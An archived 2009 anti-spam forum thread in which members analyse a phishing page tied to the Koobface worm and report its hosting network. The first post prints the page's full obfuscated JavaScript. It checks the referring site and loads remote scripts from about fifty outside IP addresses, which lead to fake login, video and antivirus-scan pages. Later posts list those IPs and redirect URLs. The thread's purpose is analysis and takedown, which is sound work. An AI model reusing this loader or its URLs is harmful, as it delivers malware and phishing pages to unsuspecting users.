Last visit was: Sat Jul 05, 2014 1:09 pm
It is currently Sat Jul 05, 2014 1:09 pm

Social sites phish/worm hosting on AS39023


All times are UTC - 5 hours [ DST ]


 [ 15 posts ] 
Author Message
 PostPosted: Thu Nov 12, 2009 3:15 pm   
Spammer Exterminator
User avatar

Joined: Mon Feb 26, 2007 11:13 pm
Posts: 1132
Source of "http://fraghouse.ichclan.at/572/?go" below, contains the following spammed links to fake login pages for:
http://fraghouse.ichclan.at/572/facebook.com
http://fraghouse.ichclan.at/572/tagged.com
http://fraghouse.ichclan.at/572/friendster.com
http://fraghouse.ichclan.at/572/myspace.com
http://fraghouse.ichclan.at/572/msplinks.com
http://fraghouse.ichclan.at/572/lnk.ms
http://fraghouse.ichclan.at/572/myyearbook.com
http://fraghouse.ichclan.at/572/fubar.com
http://fraghouse.ichclan.at/572/twitter.com
http://fraghouse.ichclan.at/572/hi5.com
http://fraghouse.ichclan.at/572/bebo.com
http://fraghouse.ichclan.at/572/.132.128.31
http://fraghouse.ichclan.at/572/.235.164.159
http://fraghouse.ichclan.at/572/137.4
http://fraghouse.ichclan.at/572/9.253.146
http://fraghouse.ichclan.at/572/.33.126.237
http://fraghouse.ichclan.at/572/97.81.
http://fraghouse.ichclan.at/572/104.176
http://fraghouse.ichclan.at/572/24.1
http://fraghouse.ichclan.at/572/45.33.205
http://fraghouse.ichclan.at/572/08.126.22.90
http://fraghouse.ichclan.at/572/79.178
http://fraghouse.ichclan.at/572/.48.193
http://fraghouse.ichclan.at/572/93.17
http://fraghouse.ichclan.at/572/5.40.214
http://fraghouse.ichclan.at/572/.250.166.77
http://fraghouse.ichclan.at/572/.78.128.27
http://fraghouse.ichclan.at/572/69.2
http://fraghouse.ichclan.at/572/05.213.172
http://fraghouse.ichclan.at/572/.128.14.14

Source:
Code:
<script>
// KROTEG
var pdousaqbmlxzcywfj8 = [
['facebook.com',  'fb2'],
['tagged.com',    'tg'],
['friendster.com','fr'],
['myspace.com',   'ms'],
['msplinks.com',  'ms'],
['lnk.ms',  'ms'],
['myyearbook.com','yb'],
['fubar.com',     'fu'],
['twitter.com',   'tw'],
['hi5.com',       'hi5'],
['bebo.com',      'be']
];
var xipjfslbtvmzgkao6 = [
'217' + '.132.128.31',
'98' + '.235.164.159',
'137.4' + '9.253.146',
'75' + '.33.126.237',
'97.81.' + '104.176',
'24.1' + '45.33.205',
'2' + '08.126.22.90',
'79.178' + '.48.193',
'93.17' + '5.40.214',
'85' + '.250.166.77',
'89' + '.78.128.27',
'69.2' + '05.213.172',
'203' + '.128.14.14',
'218' + '.168.124.246',
'94' + '.168.88.175',
'84.2' + '23.71.54',
'86' + '.2.249.242',
'61.93' + '.177.17',
'88.18' + '5.77.165',
'79.180' + '.136.188',
'88' + '.203.78.208',
'98.24' + '2.180.185',
'75.250.' + '179.122',
'115.' + '240.63.182',
'8' + '9.138.109.48',
'83.' + '93.9.216',
'95' + '.35.35.13',
'75' + '.132.234.213',
'209' + '.237.70.23',
'1' + '24.82.104.216',
'99.66' + '.69.109',
'75.4' + '.10.58',
'92.' + '143.67.161',
'74.' + '210.38.68',
'2' + '21.126.3.32',
'84' + '.109.75.232',
'92.236' + '.168.31',
'1' + '10.36.14.97',
'7' + '8.132.195.59',
'75.65' + '.253.230',
'24' + '.151.241.242',
'96.' + '237.121.115',
'6' + '8.206.98.117',
'79.181' + '.118.186',
'83.21' + '2.71.30',
'134' + '.99.134.85',
'79.' + '173.218.166',
'79.178' + '.136.68',
'69' + '.223.176.37',
'8' + '3.252.196.230'];
var zqnfwerkvbc3 = '', lmuahzfrjocktyg8 = '', iujoaqrdphg1 = '', ibudrxcywlmsovphngke9 = '';
var jazwkchdgspfvrnmoytb0 = '' + eval('doc'+zqnfwerkvbc3+'ume'+lmuahzfrjocktyg8+'nt.r'+iujoaqrdphg1+'efer'+ibudrxcywlmsovphngke9+'rer'), cnbyos2 = '';
for (var jnkethcbzgmrdlwqx3 = 0; jnkethcbzgmrdlwqx3 < pdousaqbmlxzcywfj8.length; jnkethcbzgmrdlwqx3 ++) {
    if ((jazwkchdgspfvrnmoytb0.indexOf(pdousaqbmlxzcywfj8[jnkethcbzgmrdlwqx3][0]) != -1)) {
      cnbyos2 = '/f=' + pdousaqbmlxzcywfj8[jnkethcbzgmrdlwqx3][1];
      break;
    }
}
if ((jazwkchdgspfvrnmoytb0.indexOf('google.com/reader/shared') != -1) && (jazwkchdgspfvrnmoytb0.indexOf('?id=') != -1)) cnbyos2 = '/f=ms';
if (location.href.indexOf('?go&ms') != -1) cnbyos2 = '/f=ms';
window.redirect = '';
function cnvoekxspzaqyhlt1() {
   var praenouhzdqm2 = '' + eval('win'+'dow.r'+'edir'+'ect;');
   if (praenouhzdqm2.length > 0) eval('wi'+'ndow'+'.lo'+'cati'+'on.hr'+'ef = praenouhzdqm2;');
   else setTimeout('cnvoekxspzaqyhlt1()', 50);
}
cnvoekxspzaqyhlt1();
var js = '/vi'+'ew', l = '' + eval('loc'+'at'+'ion.'+'hr'+'ef');
var n = l.indexOf('?i'+'d=');
if (n != -1) {
   n = parseInt(l.substr(n + 4));
   if (n < 101) js = '/c'+'ne'+'t';
   else if (n < 201) js = '/vi'+'ew';
   else if (n < 301) js = '/sc'+'an';
   else if (n < 401) js = '/wa'+'rn';
   else if (n < 501) js = '/y'+'out'+'ube';
}
var ss = '' + eval('l'+'oca'+'ti'+'on.s'+'ear'+'ch');
ss = (ss.length > 0 ? ss : '');
for (var jnkethcbzgmrdlwqx3 = 0; jnkethcbzgmrdlwqx3 < xipjfslbtvmzgkao6.length; jnkethcbzgmrdlwqx3 ++) {
   var nn = 'sc'+'rip'+'t', ugmktsronfzbljy7 = document.createElement(nn);
   ugmktsronfzbljy7.type = 'te'+'xt'+'/ja'+'va'+nn;
   ugmktsronfzbljy7.src = 'ht'+'tp:'+'//' + xipjfslbtvmzgkao6[jnkethcbzgmrdlwqx3] + '/go' + '.js' + '?0x'+'3E'+'8' + cnbyos2 + js + '/co'+'nsol'+'e=y'+'es/' + ss;
   document.getElementsByTagName('h'+'ea'+'d')[0].appendChild(ugmktsronfzbljy7);
}

</script>

Reported to parents of routing agent "tuxtools.com" which is a /23 operated by IpexMedia.com - who is also responsible for PharmacyExpress bogus ".at" domains.

_________________
Only on our site you will find a SPICE under the comprehensible prices!


Top
 Profile  
 PostPosted: Thu Nov 12, 2009 3:52 pm   
Spammers' Nightmare
User avatar

Joined: Thu Apr 05, 2007 4:10 pm
Posts: 2777
Interesting multi-brand phish and already 404ed. Good for IpexMedia.com (not familiar with that hoster).

Checked a few:

Code:
--- 11/12/09 14:51:37 Eastern Standard Time
--- reading URL http://fraghouse.ichclan.at/572/lnk.ms
--- contacting host fraghouse.ichclan.at [195.42.120.133] on port 80

HTTP/1.1 404 Not Found
Date: Thu, 12 Nov 2009 19:51:35 GMT
Server: Apache/1.3.37 (Unix)  (Gentoo) mod_ssl/2.8.28 OpenSSL/0.9.8g TuxTrafficLogRotate/20051209-00 TuxSQLConf/20070207-00 mod_perl/1.29 PHP/4.4.7-tuxtools FrontPage/5.0.2.2635
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

119
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /572/lnk.ms was not found on this server.<P>
<HR>
<ADDRESS>Apache/1.3.37 Server at fraghouse.ichclan.at Port 80</ADDRESS>
</BODY></HTML>

0


--- connection closed


Top
 Profile  
 PostPosted: Thu Nov 12, 2009 4:06 pm   
Site Admin
User avatar

Joined: Tue May 09, 2006 9:18 am
Posts: 5022
In plain English:

That page is checking to see which domain referred you there. Based on the referring domain, it attempts to redirect you to one of 50 distinct ips running a further JavaScript

Example:

Code:
http://71.251.56.113/go.js?0x3E8/f=/cnet/console=yes/


Which in turn said it wanted to redirect to:

Code:
http://71.251.56.113/d=fraghouse.ichclan.at/0x3E8/f=/cnet/console=yes/


Which attempts to resemble a "Download.com" page, which of course is shucking fake antivirus.

Other options include:

Code:
http://71.251.56.113/d=fraghouse.ichclan.at/0x3E8/f=/view/console=yes/
http://71.251.56.113/d=fraghouse.ichclan.at/0x3E8/f=/scan/console=yes/
http://71.251.56.113/d=fraghouse.ichclan.at/0x3E8/f=/warn/console=yes/
http://71.251.56.113/d=fraghouse.ichclan.at/0x3E8/f=/youtube/console=yes/


Each of these replicate fake versions of Youtube and other video or fake "scan" sites.

Total list of IP's in ascending order:

Code:
24.214.69.74
41.249.43.41
61.238.54.87
65.24.95.126
65.30.16.121
67.149.142.169
67.149.244.132
69.247.230.251
69.94.216.132
70.238.172.197
71.205.189.174
71.251.56.113
71.92.208.150
72.129.238.62
75.136.110.214
75.201.65.133
75.84.9.161
76.77.131.148
78.97.194.11
79.178.206.85
79.178.255.218
79.183.206.160
82.130.160.2
83.24.15.30
83.254.58.105
85.65.92.44
88.23.209.95
89.138.102.132
91.58.246.83
95.139.171.207
95.76.131.219
95.86.70.239
97.103.226.87
98.141.162.79
98.240.244.36
98.251.64.174
99.190.80.217
99.234.96.18
99.63.143.54
111.119.174.129
131.111.224.99
188.24.247.198
195.0.200.145
196.206.225.194
200.119.229.149
207.144.103.37
207.98.243.4
212.35.94.195
213.112.199.191
213.47.12.62


Note that if you view 71.251.56.113 on its own you get a fake Facebook output.

SiL


Top
 Profile  
 PostPosted: Thu Nov 12, 2009 4:07 pm   
Site Admin
User avatar

Joined: Tue May 09, 2006 9:18 am
Posts: 5022
Add: the "setup.exe" files each of these is trying to get the user to execute is, of course, Koobface.

SiL


Top
 Profile  
 PostPosted: Thu Nov 12, 2009 4:27 pm   
Spammer Exterminator
User avatar

Joined: Mon Feb 26, 2007 11:13 pm
Posts: 1132
meep wrote:
Interesting multi-brand phish and already 404ed. Good for IpexMedia.com (not familiar with that hoster).

Checked a few:

Code:
--- 11/12/09 14:51:37 Eastern Standard Time
--- reading URL http://fraghouse.ichclan.at/572/lnk.ms
--- contacting host fraghouse.ichclan.at [195.42.120.133] on port 80

HTTP/1.1 404 Not Found
Date: Thu, 12 Nov 2009 19:51:35 GMT
Server: Apache/1.3.37 (Unix)  (Gentoo) mod_ssl/2.8.28 OpenSSL/0.9.8g TuxTrafficLogRotate/20051209-00 TuxSQLConf/20070207-00 mod_perl/1.29 PHP/4.4.7-tuxtools FrontPage/5.0.2.2635
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

119
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /572/lnk.ms was not found on this server.<P>
<HR>
<ADDRESS>Apache/1.3.37 Server at fraghouse.ichclan.at Port 80</ADDRESS>
</BODY></HTML>

0


--- connection closed

Interesting that tuxtools - essentially a phish-page deployment tool, near as I can tell (though pure supposition) has branded its own httpd.

But: I get no 404 at the spammed URL -- http://fraghouse.ichclan.at/572/?go still loads all the links I listed up top.

_________________
Only on our site you will find a SPICE under the comprehensible prices!


Top
 Profile  
 PostPosted: Thu Nov 12, 2009 4:39 pm   
Spammer Exterminator
User avatar

Joined: Mon Feb 26, 2007 11:13 pm
Posts: 1132
According to PC Magazine koobface has also just been modified to permeate image-links on Google Reader, for those who have Reader accounts.

Article just published in PCWorld discusses other facets of new koobface upgrade.

_________________
Only on our site you will find a SPICE under the comprehensible prices!


Top
 Profile  
 PostPosted: Thu Nov 12, 2009 4:56 pm   
Spammer Exterminator
User avatar

Joined: Mon Feb 26, 2007 11:13 pm
Posts: 1132
And now I'm seeing it on Blogspot and on Spaces (which Microsoft has just taken down, it appears), and I'm seeing it spoofing PayPal - I removed the url...

Just copying that PayPal phish url to my clipboard triggered an Avira alert.

_________________
Only on our site you will find a SPICE under the comprehensible prices!


Last edited by MyCanadian Spammerdeath on Thu Nov 12, 2009 6:24 pm, edited 1 time in total.

Top
 Profile  
 PostPosted: Thu Nov 12, 2009 5:16 pm   
Site Admin
User avatar

Joined: Tue May 09, 2006 9:18 am
Posts: 5022
Mr. Danchev is actively documenting all of this btw:

http://ddanchev.blogspot.com/2009/11/ko ... iness.html

Definitely a good (and entertaining) read.

SiL


Top
 Profile  
 PostPosted: Thu Nov 12, 2009 6:23 pm   
You are kiillllling-a my bizinisss!
User avatar

Joined: Thu Mar 01, 2007 3:01 am
Posts: 5915
MyCanadian Spammerdeath wrote:
Hey, this is cool: Just copying that PayPal phish url to my clipboard triggered an Avira alert.


My Avira is getting apoplectic over this whole thread. Can we insert some invisible tags somewhere?


Top
 Profile  
 PostPosted: Thu Nov 12, 2009 6:23 pm   
Spammer Exterminator
User avatar

Joined: Mon Feb 26, 2007 11:13 pm
Posts: 1132
Heh: Pancho Panchev. Tribute.

_________________
Only on our site you will find a SPICE under the comprehensible prices!


Top
 Profile  
 PostPosted: Thu Nov 12, 2009 6:25 pm   
Spammer Exterminator
User avatar

Joined: Mon Feb 26, 2007 11:13 pm
Posts: 1132
AlphaCentauri wrote:
MyCanadian Spammerdeath wrote:
Hey, this is cool: Just copying that PayPal phish url to my clipboard triggered an Avira alert.


My Avira is getting apoplectic over this whole thread. Can we insert some invisible tags somewhere?

I just removed the PayPal phish url.

_________________
Only on our site you will find a SPICE under the comprehensible prices!


Top
 Profile  
 PostPosted: Thu Nov 12, 2009 9:37 pm   
Site Admin
User avatar

Joined: Tue May 09, 2006 9:18 am
Posts: 5022
Let me just say that that's a good sign (the Avira alerts.)

What's the market penetration of that tool?

SiL


Top
 Profile  
 PostPosted: Thu Nov 12, 2009 10:36 pm   
Spammer Exterminator
User avatar

Joined: Mon Feb 26, 2007 11:13 pm
Posts: 1132
spamislame wrote:
What's the market penetration of that tool?

Their website claims over 100 million users worldwide. PC World and AV-Comparatives both rate it the best of the free AV programs, though other sources give that honor to AVG - I've used both, as well as Norton and others. So far I like Avira best - though AVG has more configuration options. But it (AVG) claims - in one of its forms - to be free, yet it stops working with an almost impossible uninstall, after a time.

_________________
Only on our site you will find a SPICE under the comprehensible prices!


Top
 Profile  
 PostPosted: Fri Nov 13, 2009 12:24 am   
You are kiillllling-a my bizinisss!
User avatar

Joined: Thu Mar 01, 2007 3:01 am
Posts: 5915
The full version of Avira is cheap ($25/year) and that includes the antispyware etc. If you set Noscript to always allow trusted sites, it's nice to have a backup warning in case one gets hacked and has malicious javascript inserted.


Top
 Profile  
 PostPosted: Fri Nov 13, 2009 12:27 am   
Spam Muncher
User avatar

Joined: Thu Dec 25, 2008 8:39 pm
Posts: 786
MyCanadian Spammerdeath wrote:
spamislame wrote:
What's the market penetration of that tool?

Their website claims over 100 million users worldwide. PC World and AV-Comparatives both rate it the best of the free AV programs, though other sources give that honor to AVG - I've used both, as well as Norton and others. So far I like Avira best - though AVG has more configuration options. But it (AVG) claims - in one of its forms - to be free, yet it stops working with an almost impossible uninstall, after a time.


That's for sure, with regards to the impossible uninstall part the same is true for Avast although I finally fixed that problem. I still have registry keys that pop up even though I uninstalled the program years ago, or I did until I finally went through and manually deleted all of them by hand.

_________________
Verloren ist nur, wer sich selbst aufgibt!


Top
 Profile  
 [ 15 posts ] 

All times are UTC - 5 hours [ DST ]


Who is online

Users browsing this forum: Wayback machine and 0 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  


Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
Style originally created by Volize © 2003 • Redesigned SkyLine by MartectX © 2008